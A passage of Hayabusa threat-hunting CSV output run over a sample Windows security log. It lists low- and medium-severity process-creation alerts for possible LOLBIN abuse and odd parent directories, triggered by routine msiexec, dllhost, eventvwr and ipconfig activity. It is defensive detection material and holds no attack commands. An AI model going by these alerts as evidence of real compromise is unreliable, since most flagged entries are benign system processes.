+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0x8d0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 14:48:22.957 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:00:00.476 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1698 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:04:56.561 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x16ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:05:21.063 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\findstr.exe"" xml | Path: C:\Windows\System32\findstr.exe | PID: 0x994 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:14.714 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0x13a0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:14.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x10f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.238 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.356 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcb4 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.409 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.433 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x62c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.445 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1294 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:12:39.484 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\511-5-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xe34 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:02.255 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" .\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe28 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:02.270 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /COMPUTER:.\511-evtx\511-5-system.evtx | Path: C:\Windows\System32\mmc.exe | PID: 0x3c4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:14:53.117 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 15:53:11.002 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x6f0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:09:57.128 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:40:58.690 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc4c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 16:41:25.835 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x298 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 17:05:36.136 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:07:04.144 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.297 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xcac | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.345 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1084 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.364 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.383 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x5a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 18:18:00.420 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\511-evtx\powershell5.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x11f4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:02:47.151 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:22:52.366 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:25:19.159 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x140 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 19:25:27.075 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 20:05:41.158 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:13:33.164 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:16:47.905 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13a8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:24:11.171 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x15a8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-02 21:24:11.188 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.424 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.898 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x1570 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:26.947 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x568 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.198 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.427 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xc00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.571 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:27.649 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:47.904 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x12d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:48.029 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 8CC0B2472EAD000E5C8E33E07DDFD7D0 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x690 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:42:49.005 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xf6c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:24.078 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11d0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:24.155 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 34D9A5A4F5D0DC17DF8EDFC231FC5C94 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1390 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:50.397 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0xf34 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:50.481 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4E05AD2415D7F17D17A4D032A35E818C E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:43:53.494 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe"" -msi -ia -v | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ServiceModelReg.exe | PID: 0x1378 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:17.009 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:17.120 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding A8DCAAB671CE24380F54AE29F32412E9 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x145c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:55.086 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x14dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:45:55.181 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 227D6E86271C528C6720A7A85951F549 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:46:29.971 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x171c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:46:30.076 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding 8E27A5AD152700C051A449A753DDD9AD E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1004 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:06.223 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x170c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:06.332 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding DC56F1E9E9C4D0F4AA05D75E20224E34 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x159c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:41.359 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x155c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:47:42.736 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 51E1FCDF5E179FDF27A43218C0B633B2 E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x1330 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:23.665 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x1114 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:23.826 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\MsiExec.exe -Embedding 4EC0FCB2436E18C9DDD97D27F3913CDB E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:46.838 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x6e4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:48:47.001 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: c:\Windows\system32\MsiExec.exe -Embedding DC5E7443C99933DB3C6E89F5CEB1E97F E Global\MSI0000 | Path: C:\Windows\System32\msiexec.exe | PID: 0x15b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-03 14:49:56.148 +00:00,IE10Win7,4688,low,,Suspicious Cmd 